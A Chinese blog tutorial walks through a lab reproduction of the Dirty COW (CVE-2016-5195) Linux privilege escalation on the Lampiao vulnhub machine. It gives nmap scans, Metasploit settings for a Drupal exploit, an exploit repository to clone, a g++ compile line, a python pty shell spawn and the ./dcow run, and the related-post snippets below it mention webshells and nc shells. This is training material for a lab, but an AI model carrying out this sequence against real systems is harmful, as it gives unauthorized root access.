Linux脏牛(CVE-2016-5195)提权保姆级教程

置顶 已于 2024-04-09 11:27:48 修改
阅读量1.7k 收藏 11
点赞数 1
文章标签: linux 网络安全 系统安全 安全威胁分析
于 2023-08-17 01:35:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68408599/article/details/132332072
版权

脏牛提权 CVE-2016-5195:

该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后,利用此漏洞获取  其他只读内存映射的写权限,进一步获取 root 权限。脏牛在Linux提权中比较重要,这里详细讲解一下。

一、靶场环境搭建准备阶段

1.下载vulhub靶机:lampiao

c4fac810cf9329d02062d77df3426cc4.png

2.下载后解压到某个目录:

 

1091383c6b316da91cea8b89845d01bb.png

3.打开我们的靶机和攻击机kali,将他们都设置为NAT模式

 

32fc3427eb9dc50d3ee77f6a74fd5900.png

0a06976bbb7941deb3a97e9ed2e6152d.png

靶机保持上图样式

二、信息收集阶段

1.进入kali,查看本机ip

 

3574b7fd0790ad7c61a95b56e2cda4e7.png

2.进行端口同网段端口扫描:

nmap -sS 192.168.153.0/24

9cb0791dfb35ef649ed764b1e88fa45f.png

3.探测到靶机的ip并获知其开放的22和80端口,对这个ip进行全端口扫描

nmap -p 1-65535 192.168.153.139

 

72d7e4bf9a856de1d3e7e3de27ca6d6c.png

4.观察到开放了1898端口,进入浏览器输入该ip和端口进行访问。

 

e45a8bc961df830600a94a9fd8594f85.png

5.可以看到该网页,滑动窗口在最下面看到一个“Powered by Drupal”

 

1f174a4eabf27021bfb29d45be63dd89.png

6.“msf”,启动!

 

090f18b7fefcb80db92570c0eda68fff.png

7.输入 search Drupal寻找攻击模块,这里我们使用第二个,并查看当前options

 

ce851277dbd004e233f5bef063e6cd4b.png

8.msf设置:

设置靶机ip

set RHOSTS 192.168.153.139

设置端口

set RPORT 1898

运行

run

 

d6023593f1da3aa5a863f9d17b03b916.png

9两种信息收集方式

2.9.1:使用uname -a,找到相应的版本,并查看是否可以有相关漏洞可以利用

 

0e0981ea6610ca60559c93d446ffce58.png

查询对应的版本,猜测可能存在脏牛漏洞(为什么猜测存在脏牛,直白点就是我打的就是脏牛靶场,隐晦点就是通过相关版本可能存在相关漏洞,具体有没有还不清楚,不过也得尝试一下)

2.9.2:使用相关探针进行探测,这里我们使用linux-exploit-suggester.sh

下载方式

git clone https://github.com/mzet-/linux-exploit-suggester

10.在msf中将目录切换到/tmp目录下

 

ee829aec9fdf0d2370c2ab026b06ce24.png

12.将我们下载的漏洞探针文件上传到靶机的tmp目录下并命名为1.sh

a71c2b75df3bd972869f3d17e645d8e7.png

13.进入shell会话,我们首先输入./1.sh会发现无法运行该命令,没有运行的权限,输入chmod +x 1.sh(给其运行的权限)后,输入./1.sh重新运行.

09e1c17f35b30a35ccad94dfd80ebed0.png

这里可以看到存在相关的漏洞

0501b80b431e8f96264c3be7a30de5c3.png

三、提权阶段

1.信息收集完毕后,下载相应的提权文件

git clone https://github.com/gbonacini/CVE-2016-5195

85ae3056a5fda9e35b20ee15ba4ef39c.png

2.先上传到目标主机中 upload /root/d cow.cop(如果目标是出网的,可以尝试直接下载该exp)

3.在我们的shell界面上输入

g++ -Wall -pedantic -o2 -std=c++11 -pthread -o dcow dcow.cpp -lutil

将dcow.cpp编译成dcow(可执行文件)

4c4ea93258d3ed3d81926a30941d3b67.png

4.创建一个会话(因为需要特定的会话才能运行这个dcow文件)

python -c 'import pty; pty.spawn("/bin/bash")'

5.输入./dcow执行dcow这个程序

3189c2a18b19c9b67196b18c015d14b2.png

6.使用ssh远程连接,切换成功。

ebb52c52c18f1d4adefcff75885cb549.png

 

 

B10SS0MS
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
脏牛提权(靶机复现)
tubug的博客
03-26 1374
脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。漏洞范围Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)漏洞编号脏牛CVE编号是CVE-2016-5195。漏洞危害低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权漏洞原理。
linux利用脏牛提权
a1262443306的博客
04-18 1158
Linux利用脏牛漏洞提权: 提前准备:去github上面下载脏牛(https://github .com/FireFart/dirtycow) ​ 本主机:kali ip: 192.168.223.129 ​ 目标机:ubuntu ip:192.168.223.128 ​ 提前在目标机上面搭建环境,并开启web服务,上传一句话木马,然后用菜刀连接 打开虚拟终端: 2.利用nc实现正向shell反弹(nc下载指令: sudo apt-get install -y netcat-traditional)
dirtycow脏牛linux提权exp
03-25
dirtycow脏牛linux提权exp
Linux脏牛漏洞提权复现
wangyuxiang946的博客
07-22 1万+
操作系统: Linux ( CentOS 6.5) Web服务: PHP+Apache 环境搭建 第一步,配置yum源,安装PHP 进入yum目录 cd /etc/yum.repos.d/ 创建文件夹a mkdir a 将此目录下的所有文件移动至文件夹a中 mv C* a 创建yum源文件 vim my.repo -- 创建yum源文件,内容如下: [sss] name=my baseurl=file:/media/CentOS_6.5_Fina...
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
脏牛提权cve-2016-5159)
haha1314的博客
07-22 2万+
漏洞范围: 大于2.6.22版本 (2007年发行,到2016年10月18日修复) 危害: 低权限的用户可利用这一漏洞在本地进行提权 原理: linux内核的子系统在处理写入时复制至产生了竞争条件,恶意用户可利用此漏洞来获取高权限,对只读内存映射进行访问。 竞争条件,指的是任务执行顺序异常,可导致应用奔溃,或令攻击者有机可乘,进一步执行其他代码,利用这一漏洞,攻击者可在其目标系统提升权限,甚至可...
Linux权限提升—内核、SUID、脏牛提权
剁椒鱼头没剁椒的博客
04-02 2859
关于Linux系统提权的前置知识其实和Windows系统提权是一致的,只是在系统位置,由Windows系统更换为Linux系统而已。权限提升的本质就是通过低权限的账户转换为高权限账户,通过获取高权限账户去做想要做的事情。同时在内核提权提权的时候,需要注意有些内核漏洞需要使用到本地用户去提权,也就是非web权限,但是有些漏洞可以无视权限都可以进行提权,这一点需要注意。至于其它的命令使用方式,可以在给予的网站中去查找相关的使用方式,这里就不再进行演示了。漏洞信息:CVE-2016-5195漏洞。
vulnhub--lampiao(脏牛提权
鲨鱼辣椒的博客
08-03 4416
信息搜集 扫描网段确具体IP地址 扫描IP地址确定开放端口以及服务 浏览器查看网站 查看1898端口,发现另一个网站 扫描网站
Linux提权脏牛漏洞(CVE-2016-5195)
热门推荐
谢公子的博客
07-25 3万+
目录 脏牛漏洞 exp1复现: exp2复现: 脏牛漏洞 脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体...
脏牛提权及交互shell
weixin_43047908的博客
07-03 2477
目录什么是脏牛漏洞?影响范围及危害漏洞复现环境搭建脏牛提权完全交互shell权限维持 什么是脏牛漏洞? 脏牛漏洞(CVE-20165195),又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞,在2016年10月18后才得以修复,因此影响范围很大。 漏洞具体是由于get_user_page内核函数在处理Copy-on-Write的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。修改su或者
Linux SUID提权&脏牛提权
m0_65096687的博客
05-24 917
设置了SUID后,文件启动的时候就会以root的权限去运行。就是一个普通用户运行的时候,因为有SUID,所以用root权限去运行它。SUID Files 还有一个 Possible interserting SUID files。全部的SUID文件和一个可能可以利用的SUID文件。连接上来后把漏洞检测的脚本上传至tmp目录运行。这是利用find手动查找有SUID文件的命令。这里不知道啥原因,反弹的shell还是yx。然后我们就要观察文件中是否存在以下文件。我们就利用find进行SUID提权
DirtyCow提权漏洞复现(CVE-2016-5195)1
08-08
DirtyCow提权漏洞复现(CVE-2016-5195)复现(By Jean)目录 1. 环境部署 2 2. 漏洞复现 2 3. 参考 3环境部署主机操作系统
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
CVE-2016-5195:CVE-2016-5195漏洞利用示例
05-10
dcow是漏洞CVE-2016-5195的可能利用。 在易受攻击的系统上以无特权的用户身份运行该程序,它将修改/ etc / passwd文件,并强制输入密码“ dirtyCowFun”(SHA-512,但可以针对较旧的标准进行修改)。 如果成功执行...
脏牛提权靶机
m0_73482536的博客
05-10 202
练习的靶机
Linux脏牛漏洞提权
sGanYu
07-19 1337
通过查看kali自身的IP地址,如下图,确定当前靶机也在192.168.200下,使用nmap进行C段扫描。退出shell交互模式,返回meterpreter会话,将脚本上传至目标地址。首先我们使用nmap的sP参数通过ping探测已存活的主机。进入目标主机的/tmp目录,查看上传的1.sh是否存在。启动msf,通过msf搜索所有关于Drupal的漏洞。启动靶机后,默认是不给用户名、密码和IP地址的。上传漏洞收集脚本到目标主机赋予执行权限并执行。开启py终端,运行./dcow,获取密码。......
Kali Vulnhub-lampiao脏牛提权(dirtyCow)漏洞复现
牛奶栗的小博客
09-27 4000
​vulnhub和vulhub不同,无需安装环境。 lampiao下载地址:https://www.vulnhub.com/entry/lampiao-1,249。 下载完成正常解压后,vmware打开ovf格式文件,创建lampiao虚拟机文件即可,设置网络为NAT模式...
CVE-2016-5195 脏牛提权
最新发布
10-14
CVE-2016-5195是一种Linux内核漏洞,也称为“脏牛”漏洞,攻击者可以利用该漏洞提升其权限并访问系统中的敏感信息。 该漏洞的原因是在Linux内核中存在一个特权提升漏洞,攻击者可以通过修改系统中的文件来利用该漏洞。攻击者可以使用该漏洞来获取root权限并访问系统中的敏感信息。 该漏洞已经被修复,用户应该及时更新其系统以避免受到攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

B10SS0MS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值